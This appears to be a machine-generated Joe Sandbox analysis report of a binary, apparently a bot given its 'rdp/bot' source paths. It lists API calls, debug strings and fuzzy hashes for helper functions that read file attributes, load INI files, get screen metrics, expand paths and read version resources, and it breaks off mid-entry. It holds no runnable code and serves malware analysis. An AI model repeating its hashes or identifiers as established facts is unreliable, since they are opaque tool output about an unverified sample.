fs_attr_get, xrefs: 00007FFE11505377, 00007FFE115053AE, 00007FFE115053E7, 00007FFE11505418, 00007FFE1150554C
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE1150541F

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-2463373822
Opcode ID: 1b49e2e9eae9d51044ef7c5525761cf9ab3bcafe663e7b4f2596c0af19da1c18
Instruction ID: cfbecb1fc85fe687add6cb5c56aa8fe4f21385d64f3d4599aa220ddff5280f1d
Opcode Fuzzy Hash: 1b49e2e9eae9d51044ef7c5525761cf9ab3bcafe663e7b4f2596c0af19da1c18
Instruction Fuzzy Hash: D4513DA0A2CE0782FB225F97A4803BC63597F027BCF5445BAC91E466B4FEBDA5458701

Function 00007FFE13302D49 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE13302D6A
GetLastError.KERNEL32 ref: 00007FFE13302E4A

Strings

[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE13302F93
P, xrefs: 00007FFE13302ED3
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13302DBE
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE13302E5F
NULL, xrefs: 00007FFE13302F7A
(attr != NULL), xrefs: 00007FFE13302E20
~, xrefs: 00007FFE13302ECE
c, xrefs: 00007FFE13302E11
fs_attr_get, xrefs: 00007FFE13302DB7, 00007FFE13302DEE, 00007FFE13302E27, 00007FFE13302E58, 00007FFE13302F8C
(path != NULL), xrefs: 00007FFE13302DE7
, xrefs: 00007FFE13302E6B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13302DF5, 00007FFE13302E2E
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13302DE0, 00007FFE13302E19

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-2463373822
Opcode ID: 2e6c9001c0c235b62e19022b44b506365d7aa829aef5c15fd1a6778d35aab4b3
Instruction ID: f21cabb63969ba51708925a4a3ebfa610bd2d37c0f64505c9b62a5e9f82d0ae0
Opcode Fuzzy Hash: 2e6c9001c0c235b62e19022b44b506365d7aa829aef5c15fd1a6778d35aab4b3
Instruction Fuzzy Hash: 69515060E0CE47CEFA605B07A8403BC62107F357B4F1402B2CE3EA65B6EE6DA945D349

Function 00007FFE1150C002 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1150C04D
HeapFree.KERNEL32 ref: 00007FFE1150C05E

Part of subcall function 00007FFE11505FD5: fopen.MSVCRT ref: 00007FFE1150601A
Part of subcall function 00007FFE11505FD5: fseek.MSVCRT ref: 00007FFE11506039
Part of subcall function 00007FFE11505FD5: _errno.MSVCRT ref: 00007FFE1150604D
Part of subcall function 00007FFE11505FD5: _errno.MSVCRT ref: 00007FFE11506068

GetProcessHeap.KERNEL32 ref: 00007FFE1150C18A
HeapAlloc.KERNEL32 ref: 00007FFE1150C19B
strncpy.MSVCRT ref: 00007FFE1150C2DC
strncpy.MSVCRT ref: 00007FFE1150C2F3
strncpy.MSVCRT ref: 00007FFE1150C352

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE1150C096
ini_load, xrefs: 00007FFE1150C08F, 00007FFE1150C0CB, 00007FFE1150C3B1
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1150C1EA
NULL, xrefs: 00007FFE1150C3A2
mem_alloc, xrefs: 00007FFE1150C1E3
[I] (%s) -> Done(path=%s), xrefs: 00007FFE1150C3B8
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150C0BD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150C0D2
(path != NULL), xrefs: 00007FFE1150C0C4
5, xrefs: 00007FFE1150C0B5

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-3539035513
Opcode ID: 9c2c6add5ec6bc6832b324291e38b65c176291e6962ad2f08c5ba4a7ebbdef12
Instruction ID: 8900c6a2fc7951556e252d645c768a5dff054a1852c5eac00503a0414499c997
Opcode Fuzzy Hash: 9c2c6add5ec6bc6832b324291e38b65c176291e6962ad2f08c5ba4a7ebbdef12
Instruction Fuzzy Hash: 1EA1BF62A0DF8291FB218B97E4503BD2759AB42BA4F4880F9DE8D47BB5DE7CE545C300

Function 00007FFE13308A82 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE13308ACD
HeapFree.KERNEL32 ref: 00007FFE13308ADE

Part of subcall function 00007FFE13303A15: fopen.MSVCRT ref: 00007FFE13303A5A
Part of subcall function 00007FFE13303A15: fseek.MSVCRT ref: 00007FFE13303A79
Part of subcall function 00007FFE13303A15: _errno.MSVCRT ref: 00007FFE13303A8D
Part of subcall function 00007FFE13303A15: _errno.MSVCRT ref: 00007FFE13303AA8

GetProcessHeap.KERNEL32 ref: 00007FFE13308C0A
HeapAlloc.KERNEL32 ref: 00007FFE13308C1B
strncpy.MSVCRT ref: 00007FFE13308D5C
strncpy.MSVCRT ref: 00007FFE13308D73
strncpy.MSVCRT ref: 00007FFE13308DD2

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

Strings

ini_load, xrefs: 00007FFE13308B0F, 00007FFE13308B4B, 00007FFE13308E31
[I] (%s) -> Done(path=%s), xrefs: 00007FFE13308E38
mem_alloc, xrefs: 00007FFE13308C63
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13308B52
NULL, xrefs: 00007FFE13308E22
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFE13308B16
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13308B3D
5, xrefs: 00007FFE13308B35
(path != NULL), xrefs: 00007FFE13308B44
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13308C6A

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-3539035513
Opcode ID: 481a3fd7fd33de27e9821d400400a7bc4dfbdc80f3d27d32b68a358ca3ade38f
Instruction ID: 097ec4f64e1ca49fabfa778ac9c59392d6754b0f2eeedb83ce40cfb6cf0fa730
Opcode Fuzzy Hash: 481a3fd7fd33de27e9821d400400a7bc4dfbdc80f3d27d32b68a358ca3ade38f
Instruction Fuzzy Hash: EFA1B762A0DE8289FA10CB16E4407BD6F61EF607A4F4840B1DE6D6B7B5DE7CE545C308

Function 00007FFE11504818 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00007FFE11504849
GetSystemMetrics.USER32 ref: 00007FFE1150485E
GetLastError.KERNEL32 ref: 00007FFE1150486F

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE1150496C

Strings

(ratio != NULL), xrefs: 00007FFE11504920
(width != NULL), xrefs: 00007FFE115048F0
c, xrefs: 00007FFE11504911
sys_screen_info, xrefs: 00007FFE1150487B, 00007FFE115048C7, 00007FFE115048F7, 00007FFE11504927, 00007FFE11504978
(height != NULL), xrefs: 00007FFE115048C0
[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu), xrefs: 00007FFE1150497F
[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu), xrefs: 00007FFE11504882
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115048CE, 00007FFE115048FE, 00007FFE1150492E
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FFE115048B9, 00007FFE115048E9, 00007FFE11504919

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastMetricsSystem$fflushfwrite
String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
API String ID: 144387239-4168848430
Opcode ID: 75f0d930e48f1617a79b87325525bd4fedaac5cb75cff747d53f236e553ddb16
Instruction ID: 8693c7c70e87755966e2bdefd2ab0b2925bfb0d6e5ae1ca2d374d1889044719c
Opcode Fuzzy Hash: 75f0d930e48f1617a79b87325525bd4fedaac5cb75cff747d53f236e553ddb16
Instruction Fuzzy Hash: 9E718050E1CD4396FB71968BA40037C2A9E6F06779F9404BAD54F8A2B4DFACE981C302

Function 00007FFE13302268 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00007FFE13302299
GetSystemMetrics.USER32 ref: 00007FFE133022AE
GetLastError.KERNEL32 ref: 00007FFE133022BF

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE133023BC

Strings

sys_screen_info, xrefs: 00007FFE133022CB, 00007FFE13302317, 00007FFE13302347, 00007FFE13302377, 00007FFE133023C8
H:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FFE13302309, 00007FFE13302339, 00007FFE13302369
[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu), xrefs: 00007FFE133022D2
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1330231E, 00007FFE1330234E, 00007FFE1330237E
c, xrefs: 00007FFE13302361
(height != NULL), xrefs: 00007FFE13302310
(width != NULL), xrefs: 00007FFE13302340
(ratio != NULL), xrefs: 00007FFE13302370
[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu), xrefs: 00007FFE133023CF

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLastMetricsSystem$fflushfwrite
String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$H:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
API String ID: 144387239-4168848430
Opcode ID: d9545ac20c73ac018aa11dd156e4855825c70b1877caadbc86d7f78798e58423
Instruction ID: 44d8011ccb2fc71f2f10b9fd70f8a806cbd24a6ad4b8b4ba595f7c10c05d3d41
Opcode Fuzzy Hash: d9545ac20c73ac018aa11dd156e4855825c70b1877caadbc86d7f78798e58423
Instruction Fuzzy Hash: 71714C50F0CE47CEFB649767A41037CA1956F24378F5000F2E92EEA6B5DEACA985834D

Function 00007FFE11508148 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FFE1150817C

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE115082DB

Strings

H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115081D5, 00007FFE11508208, 00007FFE11508238, 00007FFE11508268
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FFE115082AF
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FFE115083CB
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FFE115082F0
(path != NULL), xrefs: 00007FFE115081DC
((*xpath_sz) > 0), xrefs: 00007FFE1150826F
fs_path_expand, xrefs: 00007FFE115081B0, 00007FFE115081E3, 00007FFE11508216, 00007FFE11508246, 00007FFE11508276, 00007FFE115082A8, 00007FFE115082E9, 00007FFE115083C4
(xpath_sz != NULL), xrefs: 00007FFE1150823F
(xpath != NULL), xrefs: 00007FFE1150820F
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FFE115081B7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115081EA, 00007FFE1150821D, 00007FFE1150824D, 00007FFE1150827D

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2273971785
Opcode ID: 0975a678754ac78b9d7f3c178b0852587d3cc906738610f6a04067a41accab83
Instruction ID: 224a73c40968ac7112ce0bc0c22228fc7142c0e7bdc265a15f8fd2f5e11778c0
Opcode Fuzzy Hash: 0975a678754ac78b9d7f3c178b0852587d3cc906738610f6a04067a41accab83
Instruction Fuzzy Hash: C7612E61E0CD47D5FB618B9AE8407BC235AAF81378F5944BAC94D471B9DE3CE9468301

Function 00007FFE13305B88 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FFE13305BBC

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE13305D1B

Strings

(xpath != NULL), xrefs: 00007FFE13305C4F
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FFE13305D30
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FFE13305CEF
(xpath_sz != NULL), xrefs: 00007FFE13305C7F
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FFE13305BF7
fs_path_expand, xrefs: 00007FFE13305BF0, 00007FFE13305C23, 00007FFE13305C56, 00007FFE13305C86, 00007FFE13305CB6, 00007FFE13305CE8, 00007FFE13305D29, 00007FFE13305E04
((*xpath_sz) > 0), xrefs: 00007FFE13305CAF
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FFE13305E0B
(path != NULL), xrefs: 00007FFE13305C1C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13305C2A, 00007FFE13305C5D, 00007FFE13305C8D, 00007FFE13305CBD
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13305C15, 00007FFE13305C48, 00007FFE13305C78, 00007FFE13305CA8

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2273971785
Opcode ID: d6db790e64e8fd95c482b2daa9a4b4461330f64ac07fb26293559f197ade149f
Instruction ID: dbe3fc4bbdd992102ab85eccccfeb021a6262a57eb0dd1a201190b940fc15b51
Opcode Fuzzy Hash: d6db790e64e8fd95c482b2daa9a4b4461330f64ac07fb26293559f197ade149f
Instruction Fuzzy Hash: 23616D62A0CE47CDFA208B06E8047BD1255AB65778F5411B2E57D672FADE3CE94AC30C

Function 00007FFE115041C9 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FFE115041F6
LoadResource.KERNEL32 ref: 00007FFE1150420E

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE11504308
GetLastError.KERNEL32 ref: 00007FFE1150433D
GetLastError.KERNEL32 ref: 00007FFE11504342

Strings

[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FFE11504296
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE11504352
module_get_version, xrefs: 00007FFE1150428F, 00007FFE115042C8, 00007FFE115042F3, 00007FFE11504316, 00007FFE1150434B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115042CF, 00007FFE115042FA
(out != NULL), xrefs: 00007FFE115042EC
(hnd != NULL), xrefs: 00007FFE115042C1
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE1150431D
H:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FFE115042BA, 00007FFE115042E5

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-1944070753
Opcode ID: f8976360e668b1eb4dd755dfaa8c6eaf9c42190652ad6a2f23e823a119935eed
Instruction ID: 7edf758246ac09944d37a651c085ae395482a555b28f97e15ad0eb0088d4bcae
Opcode Fuzzy Hash: f8976360e668b1eb4dd755dfaa8c6eaf9c42190652ad6a2f23e823a119935eed
Instruction Fuzzy Hash: D1416D75A19A438AE750CF6AE44056D3BA9FB49768F440275EE1DC37B8EB7CE440CB00

Function 00007FFE13307199 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FFE133071C6
LoadResource.KERNEL32 ref: 00007FFE133071DE

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE133072D8
GetLastError.KERNEL32 ref: 00007FFE1330730D
GetLastError.KERNEL32 ref: 00007FFE13307312

Strings

[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE13307322
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1330729F, 00007FFE133072CA
H:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FFE1330728A, 00007FFE133072B5
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FFE133072ED
(out != NULL), xrefs: 00007FFE133072BC
